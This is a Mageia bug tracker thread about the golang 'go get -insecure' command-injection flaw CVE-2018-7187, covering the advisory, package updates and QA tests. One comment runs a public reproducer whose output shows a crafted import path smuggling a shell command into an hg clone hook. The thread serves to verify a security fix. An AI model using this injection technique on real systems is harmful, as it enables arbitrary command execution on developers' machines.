Bug 22812 - golang new security issue CVE-2018-7187
Summary: golang new security issue CVE-2018-7187
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 6
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA6-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2018-03-21 19:20 CET by David Walser
Modified: 2019-02-05 16:36 CET (History)
3 users (show)

See Also:
Source RPM: golang-1.10-1.mga7.src.rpm
CVE:
Status comment: Patch available from Fedora


Attachments

Description David Walser 2018-03-21 19:20:51 CET
Fedora has issued an advisory on March 20:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BZKVEAK5ZG3B4FJLZVMX3HIQ73RHC4VW/

The issue will be fixed upstream in 1.11.

Mageia 6 is also affected.
David Walser 2018-03-21 19:20:58 CET

Whiteboard: (none) => MGA6TOO

Comment 1 David Walser 2018-03-31 22:34:26 CEST
Fedora has issued an advisory for this on March 30:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FMNKGQPT5QQSRDYNGXR7657KUVSGFKHC/
David Walser 2018-05-04 08:36:24 CEST

Status comment: (none) => Patch available from Fedora

Comment 2 Bruno Cornec 2018-05-04 14:01:21 CEST
version 1.10.2 which has CVE fixes has now been pushed to cauldron

Status: NEW => ASSIGNED

Comment 3 Bruno Cornec 2018-05-04 14:04:44 CEST
version 1.9.4-4 submitted to updates_testing for Mageia 6 (addition of the Fedora patch to the build)

Assignee: bruno => qa-bugs

Thomas Backlund 2018-05-06 10:50:43 CEST

Whiteboard: MGA6TOO => (none)
Version: Cauldron => 6
CC: (none) => tmb

Comment 4 Len Lawrence 2018-05-06 18:13:51 CEST
Mageia 6, x86_64

Installed mercurial before updates and tried the reproducer at https://github.com/golang/go/issues/23867

$ go get -insecure khashaev.ru/go-vuln
# cd .; hg clone -U --config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null /home/lcl/go/src/khashaev.ru/go-vuln
hello lcl
abort: repository /home/lcl/go/src/khashaev.ru/go-vuln not found!
package khashaev.ru/go-vuln: exit status 255

This output resembles that posted on the link above.

Installed these packages:
golang-bin-1.9.4-4.mga6
golang-tests-1.9.4-4.mga6
golang-shared-1.9.4-4.mga6
golang-misc-1.9.4-4.mga6
golang-src-1.9.4-4.mga6
golang-docs-1.9.4-4.mga6
golang-1.9.4-4.mga6

Tried the reproducer again:
$ go get -insecure khashaev.ru/go-vuln
package khashaev.ru/go-vuln: unrecognized import path "khashaev.ru/go-vuln" (https://khashaev.ru/go-vuln?go-get=1: invalid repo root "--config=hooks.pre-clone=echo${IFS}hello${IFS}$USER;echo${IFS}https://>/dev/null": invalid scheme)

That is what is expected I think, which confirms the fix.

Building docker is usually regarded as a good test of golang but I no longer have access to SVN.
$ mgarepo co -d 6 docker
no such identity: /home/lcl/.ssh/mageia: No such file or directory
Permission denied (publickey).
svn: E170013: Unable to connect to a repository at URL 'svn+ssh://svn.mageia.org/svn/packages/updates/6/docker/current'
svn: E210002: To better debug SSH connection problems, remove the -q option from 'ssh' in the [tunnels] section of your Subversion configuration file.
svn: E210002: Network connection closed unexpectedly

No idea what any of that means.  There is certainly no file called 'mageia' in .ssh.

May have to skip the build and look for other ways to test.

CC: (none) => tarazed25

Comment 5 Len Lawrence 2018-05-06 18:27:37 CEST
Back to Hello World!

Set up go directory structure in user directory with a beginner's script and a downloaded utility package.

$ export GOPATH=/home/$USER/go/
$ cd
$ cd $GOPATH/src/
$ cat hello.go
package main
import "fmt"
import "stringutil"
func main() {
    fmt.Printf("Good morning QA\n")
    fmt.Printf(stringutil.Reverse("\nGood morning QA!"))
}
$ go run hello.go
Good morning QA
!AQ gninrom dooG

So far so good.
Comment 6 Len Lawrence 2018-05-08 16:03:07 CEST
Copied the mageia* files from .ssh on a machine on which mgarepo had always worked before (belexeuli) but even so reading from SVN failed.

Moved to belexeuli and installed the golang updates and tried again.
$ mgarepo co -d 6 docker
Warning: Permanently added 'svn.mageia.org,212.85.158.153' (ECDSA) to the list of known hosts.
Permission denied (publickey).
svn: E170013: Unable to connect to a repository at URL 'svn+ssh://svn.mageia.org/svn/packages/updates/6/docker/current'
svn: E210002: To better debug SSH connection problems, remove the -q option from 'ssh' in the [tunnels] section of your Subversion configuration file.
svn: E210002: Network connection closed unexpectedly

No idea what this tunnels business is about - certainly no mention of tunnelling in .ssh/config.  I have never had a Subversion configuration file but mgarepo used to work.  ??
Comment 7 David Walser 2018-05-08 16:10:45 CEST
Len, I guess you didn't see my e-mail on the qa-discuss list.  You're not a packager so svn+ssh won't work for you.  You have to use svn.  Check if you have a ~/.mgarepo/config file, and if not, copy one there from /etc/mgarepo.conf and uncomment the mirror line.
Comment 8 Len Lawrence 2018-05-08 18:24:10 CEST
Sorry David, if I did see your email I might not have understood its implications.  Many thanks anyway - the config file suggestion worked like a charm.  There was no local .mgarepo - not a path trodden before, which makes me think that I must have had something like unearned packagers rights before.  I do remember that a sysadmin had to give me access without my having to do anything at my end.

mgarepo worked, 'bm -ls' also but 'bm -l' revealed missing dependencies.  Installed those and the build went to completion.

.....................
 Wrote: /home/lcl/dev/docker/docker/RPMS/x86_64/docker-zsh-completion-17.03.1-4.mga6.x86_64.rpm
Executing(%clean): /bin/sh -e /home/lcl/dev/docker/docker/BUILDROOT/rpm-tmp.aJP4t4
+ umask 022
+ cd /home/lcl/dev/docker/docker/BUILD
+ cd moby-17.03.1-ce
+ /usr/bin/rm -rf /home/lcl/dev/docker/docker/BUILDROOT/docker-17.03.1-4.mga6.x86_64
+ exit 0
succeeded!

Looks like golang is in good shape.

Whiteboard: (none) => MGA6-64-OK

Comment 9 David Walser 2018-05-12 23:34:57 CEST
Advisory:
========================

Updated golang packages fix security vulnerability:

A flaw was found in Go Lang. The "go get" implementation in Go 1.9.4, when the
-insecure command-line option is used, does not validate the import path
(get/vcs.go only checks for "://" anywhere in the string), which allows remote
attackers to execute arbitrary OS commands via a crafted web site
(CVE-2018-7187).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7187
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BZKVEAK5ZG3B4FJLZVMX3HIQ73RHC4VW/
========================

Updated packages in core/updates_testing:
========================
golang-1.9.4-4.mga6
golang-docs-1.9.4-4.mga6
golang-misc-1.9.4-4.mga6
golang-tests-1.9.4-4.mga6
golang-src-1.9.4-4.mga6
golang-bin-1.9.4-4.mga6
golang-shared-1.9.4-4.mga6

from golang-1.9.4-4.mga6.src.rpm
Len Lawrence 2018-05-13 19:13:39 CEST

Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs

Lewis Smith 2018-05-13 21:45:30 CEST

Keywords: (none) => advisory

Comment 10 Mageia Robot 2018-05-16 10:26:20 CEST
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0238.html

Status: ASSIGNED => RESOLVED
Resolution: (none) => FIXED

Comment 11 Len Lawrence 2019-02-05 16:36:28 CET
mga6, x86_64

Checked the CVEs and other links; nothing for QA to do.

Set up go directory tree for user at ~/go and defined GOPATH.
$ export GOPATH=/home/$USER/go/
$ tree go
go
├── bin
└── src
    ├── hello_1.go
    ├── hello.go
    └── stringutil
        └── reverse.go

Compiled hello.go and tested it.
Checked out docker revision 1363318 from mga6 repository.

Updated golang from updates-testing.
- golang-1.11.5-1.mga6.x86_64
- golang-bin-1.11.5-1.mga6.x86_64
- golang-docs-1.11.5-1.mga6.noarch
- golang-misc-1.11.5-1.mga6.noarch
- golang-shared-1.11.5-1.mga6.x86_64
- golang-src-1.11.5-1.mga6.noarch

From go src directory:
$ go run hello.go
Good morning QA
!AQ gninrom dooG

$ go build hello.go
$ ls
hello*  hello.go  stringutil/
$ ./hello
Good morning QA
!AQ gninrom dooG

Basic compilation and running is fine.

Building docker has generally been recommended as a test of golang.
$ mgarepo co -d 6 docker
Using the svn mirror.
[...]
Checked out revision 1363406.
[...]

2019-02-05 15:19:21 (618 KB/s) - ‘docker/SOURCES/tini-fec3683.tar.gz’ saved [32156/32156]

$ cd docker
$ bm -ls
creating package list
processing package docker-%{dist_version}-%mkrel 1
building source package
Wrote: /home/lcl/dev/docker/docker/SRPMS/docker-18.06.1-1.2.mga6.src.rpm
succeeded!
$ ls
BUILD/  BUILDROOT/  RPMS/  SOURCES/  SPECS/  SRPMS/
$ bm -l
creating package list
processing package docker-%{dist_version}-%mkrel 1
building source and binary packages
error: Failed build dependencies:
	btrfs-devel is needed by docker-18.06.1-1.2.mga6.x86_64
	glibc-static-devel is needed by docker-18.06.1-1.2.mga6.x86_64
	go-md2man is needed by docker-18.06.1-1.2.mga6.x86_64
	golang-net-devel is needed by docker-18.06.1-1.2.mga6.x86_64
	pkgconfig(devmapper) is needed by docker-18.06.1-1.2.mga6.x86_64
error: failed!

Installed the dependencies but did not know how to interpret the last one pkgconfig(devmapper).  pkgconfig is already installed.
$ bm -l
creating package list
processing package docker-%{dist_version}-%mkrel 1
building source and binary packages
error: Failed build dependencies:
	pkgconfig(devmapper) is needed by docker-18.06.1-1.2.mga6.x86_64
error: failed!

Note You need to log in before you can comment on or make changes to this bug.